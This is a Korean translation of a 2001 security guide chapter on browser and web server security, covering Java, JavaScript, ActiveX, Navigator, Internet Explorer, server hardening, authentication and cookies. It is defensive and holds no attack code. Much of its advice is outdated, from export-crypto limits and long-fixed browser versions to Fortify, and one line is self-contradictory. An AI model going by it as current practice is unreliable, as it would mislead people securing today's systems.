Last Update: 10 May 2001

13 어플리케이션 보안

• 인터넷/인트라넷
• 도입
• 클라이언트 관점의 보안 & 브라우저
• 인터넷에서 다운로드 받기
• 자바, 자바스크립트, Hot Java, ActiveX
• Netscape Navigator, Microsoft Internet Explorer
• 서버: WWW (World Wide Web)
• 참고 문서
• 개요
• 일반
• 인증
• 접근 통제
• 프라이버시 이슈/쿠키
• 가용성
• 중복성 (Redundancy)
• 인터넷 화폐
• 이메일
• 안전한 이메일: PGP, PEM, S/MIME
• 이메일 서버 & 시스템
• Microsoft Exchange V4
• MS-Mail
• 유닉스 메일: Sendmail, MMDF (Multi-channel Memo Distribution Facility)
• 사무 자동화
• MS-Office (Winword/ Excel/ PowerPoint)
• WordPerfect
• 윈도우 도움말
• Postscript, Ghostscript
• 호스트 에뮬레이터 (vt100, 3270)
• X Windows
• 도입
• 일반적인 권고사항, xhost, xauth
• Sun OpenWindows
• Common Desktop Environment (CDE)
• X Display Manager (XDM)
• Xterm
• 작업 플로우 관리자 (Workflow Managers)
• Staffware V5
• 일반
• 책임추적성, 사용자 식별 / 인가 , 감사 증적
• 접근 통제, 객체 재사용
• 안전한 데이타 교환
• 통신 상대방 인증
• 무결성
• 기밀성
• 송 / 수신 부인방지
• 가용성, 백업, 중복성 (Redundancy)
• EDI
• 안전한 어플리케이션의 개발
• 일반적인 지침
• 유닉스 어플리케이션 개발
• 개발 언어 (C, Java, Perl)
• CGI 프로그래밍
• 클라이언트/서버 통신
• ActiveX 프로그래밍
• ASP (Active Server Pages) 프로그래밍
• 코드 확인을 위한 도구
• 참고
• 이 문서에 대한 변경사항

인터넷/인트라넷

도입

인터넷 어플리케이션은 HTTP, wais, gopher, telnet 또는 ftp 같은 일반적인 인터넷 응용계층의 프로토콜을 사용하는 프로그램이다.

• 일반적으로 인터넷은 그 특성상 심각한 보안문제들을 가지고 있으므로 사외로 연결된 네트웍을 이용하는 인터넷 어플리케이션의 사용은 심각하게 고려한다. 특히 인터넷 사용에 관한 설정은 매우 신중히 결정한다. 대부분의 WWW와 같은 서비스는 반드시 방화벽기능이 있는 프록시 서버 또는 서버들을 통하도록 하며 각 서버의 설정에 만전을 기한다. 사용자들 또한 신뢰도가 낮은 사이트에서 자료/프로그램등을 받는 것에 대한 위험을 교육받을 필요가 있다.
• 반면 인트라넷은 인터넷에 사용되는 기술들을 사내 전산망에 도입하여 사용하는 것이다. 인트라넷에서 고려해야 할 보안 문제들은 다르다. 접근통제와 가용성이 예를 들면 바이러스나 위험한 프로그램들보다 중요한 비중을 가질 수 있는 것이다.

기존의 인터넷은 보안이 취약했으나 이제는 달라지고 있다. 보안시장은 빠르게 발전하고 있는 다양한 보안제품들을 선보이고 있다.
본 장에서는 인터넷/인트라넷 보안에 관한 모든 것을 다루지는 않는다. 기법(메커니즘)편, 방화벽편 그리고 가능한 UNIX/NT 편을 살핀 후 본 장을 읽을 것을 권장한다.

위험을 어떻게 줄이는가?

• 기밀성/무결성: 현재 브라우저와 WWW 서버 간의 통신에 보안이 필요하다면 주로 SSL을 사용한다. 그러나 미국을 제외한 곳에서는 암호화 수준이 낮다. Netscape 브라우저에서 Fortify를 사용하여 128 비트 함호화를 하던가 SSH (Secure Shell)를 사용하는 대안이 있기는 하다. 이 두가지 대안들은 기법(메카니즘)편에 서술되어 있다.
• 가용성: 서비스거부 공격은 존재하는 대부분의 클라이언트 서버 시스템을 위협한다. (자바의 sandbox도 포함) 서비스거부 공격의 피해를 최소화 하기 위해서는 계속적인 시스템 감독, 최신 패치 설치, 신중한 설치와 설정등의 부지런한 관리가 요구된다. 웹서버를 보호하는 방화벽을 이용, http 이외의 프로토콜을 걸러내는 것과 IP 스푸핑 (IP spoofing)을 방지하는 것또한 서비스거부 공격에 대한 피해 최소화에 도움이 된다.

보안 문제들은 크게 클라이언트 관점에서의 보안과 서버 관점에서의 보안으로 나눌 수 있다.

클라이언트 관점에서의 보안과 브라우져

인터넷에서 다운로드 받기

트로이의 목마, 그릇된 문서나 프로그램 그리고 바이러스들로 인한 손해를 피하기 위해서 인터넷에서 파일을 다운로드시에는 많은 주의가 필요하다.

• 가능하면 [MD5] 해시 혹은 PGP 사인을 사용, 기밀성과 출처를 확인한다.
• 본래의 출처로부터 다운로드를 하기. 사무자동화편을 참조한다.
• Word, Excel, Access 등에 포함된 매크로들, Postscript 또는 ActiveX 등을 사전 검사 전에 열어보지 말것. 이것들은 바이러스 또는 트로이 목마일 가능성이 있다.
• Word를 사용하지 말고 Word를 사용하여 다운로드한 Word 문서를 읽는다.
• Word 문서 서식 파일인 normal.dot을 읽기전용 파일로 설정한다.
• 가능하면 다운로드를 받는 대신 CD로 구입. CD 구입은 경제적이며 보다 안전하다. 특히 개발자로 부터 직접 구입하는 CD는 경제적이며 안전하다. GNU CD-ROM 들이 그 예이다.

자바

1995년에 Sun Microsystems가 발표한 자바는 새로운 바람을 일으키고 있다. 자바는 C/C++와 닮은 언어로서 멀티쓰레드, 객체지향, 네트웍 그리고 바이트 코드 (byte code)를 이용한 이식성을 제공한다. 바이트 코드는 자바 가상 머신을 탑재한 어떠한 컴퓨터 상에서도 실행 또는 해석될 수 있다. 하지만 바이트 코드의 사용은 높은 이식성을 제공하는 대신 성능저하를 유발한다. (해석기가 느리기 때문이다. - 하지만 이것은 자바칩과 JIT (Just In Time) 컴파일러가 널리 사용되면서 극복될 것이다.)

자바는 두가지 상태로 돌아가게 설계되었다: 독립된 하나의 어플리케이션 (application) 개발을 위한 자바와 "애플릿 (applet)"으로서의 자바. 애플릿은 웹 페이지에서 브라우져로 다운받는 작은 자바 프로그램이며 브라우져에 의해 실행된다.

자바는 호화로운 WWW 홈 페이지와 높은 이식성을 가진 어플리케이션의 개발을 가능하게 했다 (Microsoft 는 자바의 이식성을 멈추기 위해 최선을 다하고 있지만). 일부 전문가들은 자바의 높은 이식성이 클라이언트/서버 환경의 미래라고 주장하고 있다.
자바 V1.02는 Navigator V2 (와 이후 버젼) 에서, IE3과 Mosaic과 PowerBrowser에서 지원한다. 자바 V1.1은 IE4, 1998년1월자 JVM fix가 설치된 Navigator 4.04 나 Navigator4.05 및 이후 버젼에서 작동한다.

자바는 외부 코드의 실행에 안전한 환경을 제공하도록 설계되었다:

• 자바언어는 안전하도록 만들어졌다. (예: 객체지향, 자동 쓰레기 수집, 제한된 자료형 변환 (casting)/자료형 제어 그리고 포인터 연산 없음) 자바 컴파일러는 엄격한 안전 수칙을 적용한다.
• 바이트 코드 검증기: 런타임에 들어온 바이트 코드가 안전 수칙을 지키는지 확인한다 (악성 컴파일러로부터 보호). E.g. 스택 오버플로우/언더플로우 (stack overflow/underflow), 허가되지 않은 자료형/자료형 변환, 위조된 포인터, 보호된 클래스로의 접근. 클래스 로더 (class loader)는 이름 공간(name sapce) 이나 주소제한 규정들을 지키도록 감시한다. Import 된 클래스들은 핵심 고유 클래스들을 spoof 할 수 없다. 이름 공간을 로컬과 URL 관련으로 나눈다.
• 자바 1.1 은 암호화와 서명을 위한 암호(crypto-) api를 탑재한다. 그러나 이것은 미국 수출규제에 의해 제한된다.
• 보안 관리자: 애플릿에서의 API들의 사용을 제한하고 위험한 메소드 (method)를 색출한다. 애플릿에서는 사용자의 브라우져가 보안 관리자의 정책을 정한다.
• 파일 시스템과 네트웍 접근 보호: import 된 코드가 허가되지 않은 접근을 시도할 경우 대화창이 뜨도록 하고 사용자가 사용허가를 심의하도록 한다.
• 쓰레드들을 서로로부터 보호, 클래스로의 접근을 제어.
• 운영체제로의 접근 제어.

자바 애플릿들에는 다음의 제한이 추가된다:

• V1.02에서는, 애플릿이 직접 시스템 호출이나 파일 시스템 접근, 타 애플릿의 간섭, 로컬 환경 도청 또는 네트웍 연결 등을 할 수 없다 (애플릿을 제공한 웹 페이지로의 연결을 제외).
• V1.1 이나 이후 버젼에서는 애플릿이 서명 될 수 있다. 서명된 애플릿들은 출처를 믿을 수 있으므로 브라우져의 설정에 따라 보다 많은 로컬 자원 사용이 허가된다. 애플릿뷰어 (appletviewer), NS4 & IE4는 각기 다른 방식으로 애플릿에 서명을 하고 다른 방식으로 접근을 제한한다. (Doc_CodeSigning.html을 참조) 자바 1.2에서는 이점이 시정되기를 바란다.
• 자바 FAQ - 애플릿 보안 또한 참조한다.

어떤 위협들에 대해서는 자바 설계에서 다루어지지 않았다:

• 서비스 거부 공격: 공격자의 애플릿은 지나친 메모리, CPU, 자원등의 탕진을 유도해 호스트의 정지를 유발할 수 있다.
• 잘못된 설정을 이용한 공격: 모든 애플릿은 같이 방식으로 처리된다. 브라우져들은 애플릿에 동일한 규칙을 출처를 불문하고 적용한다. 만약 보안 관리자가 애플릿의 요구에 따라 파일 접근을 허가한다면 모든 애플릿은 파일로 접근이 가능하게 된다. 서명을 사용하여 이 문제를 어느정도 극복할 수 있다.
• 사회공학적 공격: 공격자의 애플릿은 사용자 이름/패스워드를 요구하는 대화상자를 표시함으로서 사용자를 속일 수 있다. 일부 브라우져들은 내장된 경고문을 표기하기도 한다. [서명은 여기서도 도움이 된다].
• 지속성: 애플릿은 사용자가 다른 웹 페이지로 이동해도 계속 실행될 수 있다.
• 자원의 악용: 공격자의 애플릿이 사용자가 인식하지 못하게 사용자의 컴퓨터에서 작동하며 그 결과를 애플릿의 서버에 보고할 수 있다. 사용자가 모르게 사용자의 컴퓨터로부터 이메일(Email)을 보낼 수 있다.
• DNS: 자바는 DNS를 지나치게 신뢰한다. 만일 공격자가 그릇된 DNS 정보를 전달할수 있으면 애플릿에 적용되는 네트웍 제한장치들을 무시할 수 있다.

위의 내용들은 이론적인 관점에서 다루어진 내용이다. 자바가 보다 많이 사용되면서 문제점들이 생겼다.

• 1996년 2월, 자바스크립트와 자바에서 몇가지 보안관련 버그가 발견되었다. 이들은 DNS Spoofing 및 클래스 로딩 (class loading) 시 잘못된 보안 점검과 관련되어 있다. 이 문제점들은 JDK 1.0에서 1.01로 업그레이드함으로서 수정될 수 있다.
• Navigator에서 더 많은 보안관련 버그가 발견되어 (아래 참조), 자바는 아직 전성기를 누릴 준비가 안되어 있다는 목소리가 높아지고 있다. Prinston 대학의 자바 보안 분석보고 자료를 인용한, 자바 클래스 로더에 대한 NASIRC BULLETIN B-96-24 를 참조한다 [java1]. 연구 자료는 꽤 심도가 깊다고 생각되며 자바 개발자나 설계자들이 읽어보아야 한다. 이들의 결론은 다음과 같다:

우리는 현재의 자바를 안전하게 만드는 것이 어렵다고 생각한다. 언어 자체, 바이트 코드의 형식, 그리고 런타임 시스템의 완전한 재설계만이 보다 높은 신뢰도를 가진 시스템으로의 발돋움을 가능하게 할 것이다. 공식적인 근거 없이, 시스템 보안에 대한 성명은 결정적일 수 없다.

자바에 결함이 있다고 해서 다른 경쟁 시스템들이 보다 안전하다는 의미는 아니다. 경쟁 시스템에 동일한 수준의 정밀조사가 적용되었다면 결과는 비슷했을 것이라고 추측한다. 원격에서 로드된 코드를 실행하는 것은 비교적 새로운 동향이며 이를 안전하게 하려면 보다 많은 노력이 필요하다.

현재는 (2000년 7월, 4년 후), 다른 보안 문제들은 소수 발생했고 (예를들면 브라우져 자체의 보안 버그와 비교하여) JDK 1.1이 대부분의 브라우져에서 지원됨으로 인해, 서명 애플릿의 사용이 두드러질 것이다.

결론:

• 자바는 C, C++, VB, 자바스크립트, VBscript 같은 다른 인기 언어들, 그리고 ActiveX 같은 원격 코드 실행 기술보다 더 안전하다. 아직 태동에 따른 문제가 있지만 밝은 미래도 가지고 있다.
• 자바의 위험과 이점에 대한 사용자 교육이 중요하다.
• 매우 민감한 컴퓨터를 사용하는 사용자는, 믿을 수 있는 서버 (예: 인트라넷 상의 서버) 에 연결했을 때 사용되는 경우를 제외하고는, 인터넷 WWW 브라우져에서 자바 애플릿 실행기능을 억제한다.
• 자바는 독립된 어플리케이션 개발에 뛰어난 언어이다. 보안관점에서 볼 때, 자바는 예를 들자면 C나 C++보다 뛰어난 보증을 제공한다. 장기적으로 볼 때, 자바는 예쁜 웹페이지를 위한 애플릿 보다는 독립 어플리케이션 영역에서 더 큰 효과를 발휘할 것이다.
• 군용급의 암호화와 서명을 구현하기 위한 발달된 자바 라이브러리들도 있다.
• 아직 자바를 사용한 GUI 개발은 부담이 되는 일이다. 예를 들면 윈도우 GUI 개발에는 델파이 (Delphi) 가 한참 앞서있다.

자바스크립트

자바스크립트는 자바와 구문법은 비슷하지만 자바와는 아무 관계가 없다. 자바스크립트는 클라이언트측에서 해석되는 스크립트 언어로 Netscape 에서 개발하였다.
자바와는 달리 sandbox에서 작동하지 않으며, 파일 올리기, 메일 보내기, 어떤 것이든 쓰여진 내용을 대화상자로 표시하기, 그리고 로컬 파일에 쓰기를 한다 (대화상자를 통해서라도). 자바스크립트에는 두개의 보안정책이 있다:

1. 동일 출처 정책 (same origin policy) 은 Navigator 2.0 부터 디폴트 정책이었다. 한 출처로부터 문서를 적재할 때는, 다른 출처에서 로드된 스크립트는 윈도우나 프레임, 객체(그림, 레이어, 주소, 창, 문서) 에서 속성을 가져오거나 설정할 수 없다.
2. Communicator 4.0 에서 새로 나온 서명된 스크립트 정책 (The signed script policy)은 새로운 자바 보안 모델인 객체 서명을 토대로 한다. 자바스크립트의 새로운 정책을 사용하려면, 새로운 자바 보안 클래스를 사용하고 자바스크립트로 만든 스크립트들에 서명한다.

보안관련 버그가 계속 발견되므로 수개월마다 반드시 최신판 브라우져로 업그레이드한다.

Note: 자바스크립트가 이메일로 첨부된 html 파일로 배달될 경우에는 무슨일이든지 할 수 있다, 즉 대화상자 프롬프트 없이, 사용자가 이를 시작할 때 이미 권한을 가지게 된다! 이를테면 사용자의 PC의 파일 시스템을 이메일로 보낼 수도 있다.

권고사항

• HTML 소스로부터 자바스크립트 코드를 읽을 수 있으므로 보안 함수 (e.g. 패스워드 확인 같은) 에는 절대로 자바스크립트를 사용하지 않는다.
• Communicator 4.x 와 같이 명명된 폼의 출처 확인을 확실히 하는 브라우져를 사용하고 src_fron_non_file 보안 결함을 수정한다 (IE4.0 은 아직 미확인상태이다). Navigator 3.0 은 웹페이지의 특정 콤포넌트로의 안전한 접근 수단을 제공하기 위해 데이타 오염(Data Tainting) 을 제공하였다. 서명된 스크립트의 사용이 데이타 오염 방법보다 향상된 보안을 제공하기 때문에 Communicator 4.x에서는 사용하지 않는다.
• 민감한 데이타를 다루는 사용자: 자바스크립트의 사용을 금지한다. 자바스크립트가 인터넷에서 널리 사용되는 만큼 이로인해 사용자가 사이트 선택에 제한을 받게 되겠지만.

Hot Java

Hot Java는 자바 언어가 어떤 것을 할 수 있는지 증명하기 위해 개발된 Sun Microsystems社의 WWW 브라우져이다. Hot Java 는 지원이 없고 순수히 자바의 가능성을 입증을 위해 만들어졌고, 특히 Hot Java 는 보안에 여러 개의 보안 결함들이 있으므로 일반 사용자들이 사용해서는 안된다. ([java1]을 참조한다.)

브라우저의 ActiveX

ActiveX는 웹 페이지의 프로그램을 PC에서 실행하도록 설계되었다. ActiveX에는 프로그램의 출처를 인증하는 기능외에는 어떠한 보안 정책이나 보안 개념조차 없다. 웹 브라우져를 통해 받은 ActiveX 프로그램들은 사용자의 PC에서 아무 제한없이 실행된다. 예를 들면 하드디스크를 포멧하거나 시스템 종료같은 작업들이 가능하다. ( 몇 가지 예를 보려면 www.halcyon.com/mclain/ActiveX 를 참조한다.)

• 자바와는 달리 ActiveX는 보호된 "sandbox" 에서 돌아가지 않는다. 악의적인 ActiveX 프로그램들로부터 사용자의 컴퓨터는 어떠한 보호도 받을 수 없다.
• 예를 들면 내부 네트웍 상의 신뢰되는 서버와 같이 100% 신뢰할 수 있는 출처에서만 프로그램을 받는다.
• 소프트웨어의 출처가 확실하다고 해서 (서명이 되어있다든지), 소프트웨어에 예상치 못한 부작용이 없음을 의미하지는 않는다는 것을 항상 주의한다.
<
• 모든 클라이언트에 대한 권고: ActiveX를 비활성화 시키거나, CERT 지침을 읽고 적용한다 [activeX].

Netscape Navigator

PC부터 UNIX까지 다양한 플랫폼에서 작동하는 Netscape 의 브라우져는 많은 사용자들의 기본 브라우져로 애용되고 있다.

• Navigator는 SSL을 지원하는 WWW 서버와 암호화된 데이타 교환이 가능하다. (보안연결이 이루어지면 특별한 대화상자가 나타난다.) 이 기능은 주로 전자상거래(Online Shopping)나 전자은행업무처리(Online Banking)에 쓰인다. 미국내에서는 128 bits의 암호키가 사용되며 미국 밖에서는 40 bits의 암호키가 사용된다. (이것은 2000년, 미국 암호기술 수출제한 관련법규가 완화되어 국제적으로도 강력한 버전들이 사용가능하게 되면서 바뀌었다.) Navigator 2.0은 SSL, SNEWS와 HTTPS를 지원한다.
  • 고성능의 컴퓨터를 사용, 브루트 포스 공격 (Brute force attack) 방법으로 수출용인 40 bits 세션 키가 불과 수시간만에 무력화되는 것을 증명하였다.
  • 그러나, 더욱 안좋은 것[2]은 예측가능한 의사난수 발생기(pseudo-random number generator)를 사용한 Netscape 1.1의 마스터 키가 보통 웍스테이션급 컴퓨터를 사용하여 불과 수 시간만에 무력화될 수 있음이 증명되었다는 것이다. Netscape 는 패치를 배포하기 전에 새로운 의사난수 발생기 코드를 공개하여 누구나 코드를 실험할 수 있도록 하였다. (수정: 2.0으로 업그레이드 한다.)
  • Netscape 2.0은 자바스크립트를 사용한 파일 접근과 자바 애플릿을 위한 DNS 주소 처리방법에 버그가 있다. (수정: 2.01로 업그레이드 한다.)
  • Netscape 2.02로의 업그레이드는 자바 클래스 로더와 자바스크립트의 보안오류를 수정한다.
  • 위의 오류들은 이미 5-6년전에 발견된 것들이며 매달 새로운 오류가 발견되고 있다. 항상 최신의 브라우져를 사용하도록 한다.
• Navigator는 자바, 자바스크립트, 암호화 그리고 인터넷 상거래를 위한 SSL과 같은 보안 기능 등으로 매우 복잡하고 방대한 프로그램이 되었다. 이러한 복잡/방대함 그리고 6개월마다 업그레이드되는 Navigator는 버그와 따라서 보안결함의 가능성이 다분하다.
• Navigator의 라이브러리들을 공유된 서버에 저장하는 것을 고려한다. (예를 들면 유닉스에선 라이브러리들을 /usr/local에 저장한다.) 이 방법으로 라이브러리의 문제들을 빠르게 정비할 수 있다. Netscape의 중앙설치를 고려한다.
• 메뉴의 옵션->보안설정에서, Navigator V3는 경고메세지(alert dialogues) 사용, SSL 사용여부, 사용자 패스워드를 이용한 Netscape와 인증서의 사용제어의 기능들을 제공한다.
• 메뉴의 옵션 -> 넷트웍설정을 사용하여, Navigator V3는 프록시 서버 설정 또는 인터넷 직접 연결을 설정할 수 있다. 전자 서식의 전송 또는 쿠키를 받기전에 경고문이 나타나도록 설정할 수 있다. 자바와 자바스크립트도 사용금지 시킬 수 있다.
• 가장 좋은 소식은 http://www.fortify.net/에서 Fortify라는 프로그램을 다운 받아서 수출용 Navigator의 강한 암호화 기능 제한을 제거할 수 있다는 것이다. 백문이 불여일견이다!
  UPDATE: 2000년도 부터 강력한 브라우저 버전이 국제적으로 사용 가능하게 되면서, 더 이상 Fortify가 필요 하지 않다.

Microsoft Internet Explorer

Explorer 3.0은 자바, SSL 2, SSL 3, 소프트웨어 서명, PCT 1.0, ActiveX 그리고 ActiveX 스크립트/VB스크립트를 지원한다.

• 메뉴의 보기 -> 옵션 -> 보안을 사용하여 몇가지 보안관련 설정을 할 수 있다. 자바는 세단계로 제한될 수 있다. ActiveX, Active 콘텐트의 플러그인 다운로드를 금지할 수 있다. 인증서와 사이트의 등급 설정이 가능하다.
• WWW 서버로 IIS를 사용하고 NT Lan Manager를 써서 사용자 인증하는 NT 환경에서, Explorer는 제한된 접근을 가지는 WWW 페이지에 투명하게 접근을 제공할 수 있다. E.g. IIS의 특정 WWW 페이지가 특정 NT의 특정 그룹만 읽을 수 있도록 제한된다면, Explorer는 사용자의 ID와 패스워드 재입력 없이 사용자를 IIS 서버에 인증시킨다. 이는 인트라넷에서 매우 유용한 기능이다. 한편 Navigator는 HTTP auth 를 사용해야 하고 (덜 안전) 항상 패스워드의 입력을 요구하여 이런 상황에서는 덜 안전하게 만들며, 사용자 입장에서 보면 좀 귀찮다.

문제점들:

• www.Microsoft.com/security를 참조한다. [그러나 그게 다가 아니다...]
• 발표되고 나서부터 Internet Explorer 는 끊임없는 보안문제들을 만들어 내왔다. 하지만 이로인해 Microsoft 가 Internet Expolorer 를 점점 더 복잡하게 만드는 것을 멈추지는 않았다. 다음은 초기 버그들의 일부이다.

Executing Code on IE 4.0 and 4.01 (Jan.13'98)
Cracking Windows 95 Share
Passwords (Jan.9'98)
Teardrop 2 Attack (Jan.9'98)
IE Page redirect (Nov.19'97)
land Attack (Nov.17'97)
IE4 (Oct.11'97)
IE4 & DHTML (Oct.16'97)
IE4 & Java (Sep.12'97)
OOB Attack (May.9'97)
IE & Powerpoint (May.7'97)
Samba Can Grab Win95 Passwords (Mar.17 '97)
IE Hole with NTLM (Mar.15 '97)
IE & Netscape Hole Found (Mar.14 '97)
Run Local Commands With IE (Mar.7 '97)
Get IE To Launch Remote Apps (Mar.6 '97)
IE .LNK and .URL Problems (Mar.3 '97)
Potential Active Server Problem (Feb.20 '97)

• IE4 는 웹공간을 인터넷, 인트라넷등의 영역(zone)으로 나누어 사용자가 현재 사용하고 있는 영역을 상기시키며 영역별로 보안지침을 규정할 수 있게 한다. 하지만 이런 방법으로 버퍼 오버플로우 (buffer overflow) 같은 문제를 막을 수 없으며 신뢰된 ActiveX 콤포넌트와 "안전한" 스크립트들이 2000년도에는 새로운 문제점으로 떠올랐다.

Microsoft 가 모호함에 의한 (알고리듬, 사내 프로그램 평가 또는 보안 취약점등을 항상 사용자들에게 알리지 않고) 보안을 성취하려는 한 Explorer는 높은 수준의 보증을 제공할 수 없다. 하지만 IE는 Microsoft 의 운영체제와 하나가 되어가고 있으며 무료로 배포되고 있기에 앞으로 더욱 많은 사용자를 확보할 것이다.

서버들: WWW (World Wide Web)

Servers: WWW (World Wide Web)

참고 문서

1. WWW 서버를 설치하기 전에, 다음 FAQ을 읽는다. 다음의 FAQ들은 서버 설정과 cgi 스크립트에 관하여 매우 자세히 설명되어있다.
   www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html와 www.cerf.net/~paulp/cgi-security 또는 hoohoo.ncsa.uiuc.edu/cgi/security.html.
2. HTML관련 서적: "Webmaster in a Nutshell" (O'Reilly), "Teach Yourself Web Publishing with HTML in 14 Days", ISBN 1-57521-014-2 또는 "How to set up and maintain a World Wide Web Site: The Guide for Information Providers", Lincoln Stein (Addison-Wesley), ISBN 0-201-63389-2.
3. WWW 보안에 관한 메일링 리스트
   www-security-request@nsmx.rutgers.edu
   body= SUBSCRIBE www-security YOUR_ADDR

안전한 HTML 버전과 Web상에서의 트랜잭션 처리의 보안에 관해서는 다음 링크들을 방문한다:

http://home.Netscape.com/info/SSL.html
http://www.commerce.net/information/standards/drafts/shttp.txt
http://www.w3.org/hypertext/WWW/Shen/ref/security_spec.html
http://www.w3c.org/
http://www.fv.com/
http://www.digicash.nl/
http://www.cybercash.com/
http://www.mcom.com/
http://www.algroup.co.uk/Apache-SSL

간단한 인증에 대한 정보는 다음 링크를 방문한다:

http://www.w3.org/hypertext/WWW/AccessAuthorization/Basic.html

서버 상태 코드에 관해서는 다음 링크를 방문한다:

http://www.w3.org/hypertext/WWW/Protocols/HTTP/HTRESP.html
부록 C에 기재된 인터넷 참조문도 참고한다.

개요

WWW은 매우 빠르게 발전하고 있고 여러 업체들의 임의추가, 프로토콜, 다른 사용자 환경등으로 매우 복잡해지고 있다. 본 절에서는 안전한 WWW 서비스 제공과 관련된 WWW의 일부분만 언급한다.

• 안전하게 설정된 운영체계. (더욱 자세한 것은 UNIX/NT 장을 본다.)
• 방화벽을 사용한 보호. (방화벽 장을 본다)
• 안전하게 설정된 HTTP 서버 (방화벽 장과 아래를 본다.)
• SSL, SET, HTTPS등의 보안 프로토콜의 사용 (메카니즘 장을 본다).

일반

HTTP는 클라이언트가 연결을 시작하고 서버는 응답 후 연결을 종료하는, 비 상태기반 (stateless) 프로토콜이다. HTTP/1.0 요청은 사용자의 이메일 주소를 가리키는 from 필드, URI를 획득한 곳을 나타내는 referrer 필드 (즉 사용자의 컴퓨터와 도메인) 그리고 현재 사용중인 브라우저를 나타내는 user-agent 필드를 제공한다. 이러한 필드들은 사용자의 브라우저의 설정에 따라 사용 또는 사용되지 않는다.

• 로그파일의 감사, 가지치기 그리고 보관을 주기적으로 한다.
• cgi-bin 폴더 속에 펄 해석기나 sh해석기를 넣어두지 않는다. 아니면 네트웍 상에 연결된 누구라도 당신의 서버에서 자신들의 프로그램을 실행시킬 수 있다!
• 유닉스에서는 포트 80으로의 접속을 허가하기 위해 root가 httpd를 실행하도록 되어있다. 하지만 root로서 httpd를 돌리는 것은 매우 위험하므로, nobody 같이 root 이외의 사용자로 불러지는 httpd (대부분의 서버들이 이런다)를 사용하거나 chroot 환경에서 서버를 운영한다.
• 컴파일러나 X11 소프트웨어들을 웹서버에 설치하지 않는다.
• x-csh를 클라이언트와 서버의 mime.types에서 제거한다.
• 특정 버그들/패치들:
• NCSA HTTP 서버 V1.3에는 누구나 서버를 함락 시킬 수 있는 버그가 있다. V1.4 또는 V1.4 이후의 서버를 설치한다.
• Apache 1.05는 cgi 프로그램에 인수를 전달할 수 있었던 것이 수정되었다. 1.3.4 또는 이후의 아파치의 사용을 권장한다. http://www.apache.org/를 참조한다.
• CERN 서버 V3.0의 CGIParse 스크립트에 보안문제가 있으며 보안 설정들은 httpd.conf에서 간단히 회피할 수 있다. (NASIRC Bulletin B-96018을 참조한다). httpd.conf 문제는 패치를 설치함으로 수정할 수 있고 CGIParse 문제는 다음을 모든 “Exec”, “Map” 또는 “Pass” 형식에 포함하여 수정할 수 있다:

Fail //*
Fail *//*
Fail /./*
Fail */./*

• 프록시 WWW 서버는 Firewall 장에서 다룬다.

인증

대부분의 서버들은 access.conf와 같은 전체설정 또는 .htaccess/ .nsconfig와 같은 폴더별 설정을 사용하여 특정 파일들로의 접근을 패스워드를 사용하여 제한할 수 있다. 이것을 기본인증(Basic Authentication)이라 한다. IP주소나 컴퓨터이름에 근거한 접근제한 또한 대부분의 서버들은 지원한다. 이 두가지 방법은 간단한 것이 아니다 (예: 기본적인 auth는 base64로 사용자이름과 패스워드를 암호화한다. 이러한 암호화는 풀기가 쉽고 따라서 암호화하지 않는 것만 못하다).
access.conf는 Apache/NCSA를 참조하고 .nsconfig는 Netscape를 참조한다.

• 유용한 메카니즘이긴 하지만, 기밀 문서를 보호하는 데 이들에게 의존하지 않도록 한다. 기밀 문서들은 강력한 알고리듬으로 암호화되지 않는 한 외부 WWW 서버에 두어서는 안된다. 패스워드와 그룹 파일들이 document root 에 있지 않도록 주의한다.
• SSL (Secure Sockets Layer) 은 향상된 인증, 접근통제 및 비밀성(privacy)을 제공한다. 그러나, 이것의 암호화 강도는 미국 수출규제에 의해 엄격하게 제한된다. 보안 메카니즘 장을 참조한다. (지금은 달라짐)
• MS IIS 는 기본 인증 (Basic Authentication) 외에 NT challenge-response 를 기반으로하는 인증을 제공한다. ("Lan Manager auth") 이런 유형의 인증은 "HTTP auth" 보다 훨씬 더 강력하지만 심각한 문제도 가지고 있다 (위 Explorer 버그 목록 참조). 이 인증 방법은 인트라넷상의 접근을 제한하는 데는 좋지만, 인터넷에서는 아니다.
• Apache 와 mod_perl 이 있으면, 맞춤 인증 모듈을 만들기가 쉽다. http://www.perl.apache.org/ 참조.

접근 통제

• 패킷 필터를 사용하여 인터넷으로부터 들어오는 불법적인 패킷들을 버린다 (방화벽 장을 참조). 이 필터는 공격자가 실제로 침투했을 경우 손실을 최소화 하기 위해 나가는 udp, NFS, rpc, X11 연결들도 금지해야 한다.
• 도메인 이름에 따른 접근은 IP 주소에 의한 접근을 제한하기 위해 사용될 수 있다 (e.g. access.conf 나 Netscpae 서버에서 filter.conf).
• 디렉토리별 접근통제는 .htaccess 나 .nsconfig 에서 설정할 수 있다.
• 내부 WWW 서버들이나 데이타베이스들은 지능적 필터를 통한 믿을 수 있는 서버로의 연결이 아니면 인터넷으로 어떤 직접적인 연결도 없어야 한다.
• 사용자들은 중요 WWW 서버에 직접 로그인할 수 없어야 하며, WWW 서버와 일반 사용자 홈/메일 서버를 분리한다.
• 서버를 절대 root로 돌리지 말고, 패스워드가 막힌 전용 사용자를 사용한다. 사용자는 문서, WWW 설정 및 시스템 파일들에 대한 읽기 접근만을 가져야 한다. 이는 서버가 침투되었을 경우 야기될 손실을 제한하는 데 도움이 된다.
• 어떤 서버들은 symbolic links 를 따라가는 옵션을 가지고 있다 (e.g. Apache access.conf/Options FollowSymLinks). /etc/passwd 같은 곳으로 가는 링크를 따라가는 것을 피하기 위해 이를 쓰지 않는 것이 좋다.
• 당신의 페이지가 알타비스타 같은 검색엔진에 의해 나열되길 바라지 않으면 WWW root 에 robots.txt 을 둔다. 또한 접속 로그 (access log)를 감시하여 로봇 항목들이 있는지 찾는다. 일반적으로 이 파일은 다음을 포함하고 있을 것이다:

User-agent: *
Disallow: /

• Server Side includes (SSI): SSI exec "/bin/cat <filename>" 보다 SSI include "<filename>" 이 더 안전하다.

프라이버시 이슈 / 쿠키

• 서버가 당신에 대해 뭘 알고 있는지 보려면, 여기에 연결해 보라: http://www.anonymizer.com/ .
• 서버는 여러가지 이유로 당신이 누구인지 등등을 알고 싶어한다, 이를테면:
• 선호하는 것을 저장하여 당신의 습성에 따른 자동 링크를 소개하기 위해,
• 사이트의 여러가지 페이지들로부터 몇 개의 자료만 선택할 수 있도록 하여 사용자가 사이트를 나가더라도 선택한 것들은 계속 사용 가능하도록 하기 위해,
• 등록정보를 저장하여, (예를 들면) 사용자이름과 패스워드를 계속 입력하지 않아도 되게 하기 위해.

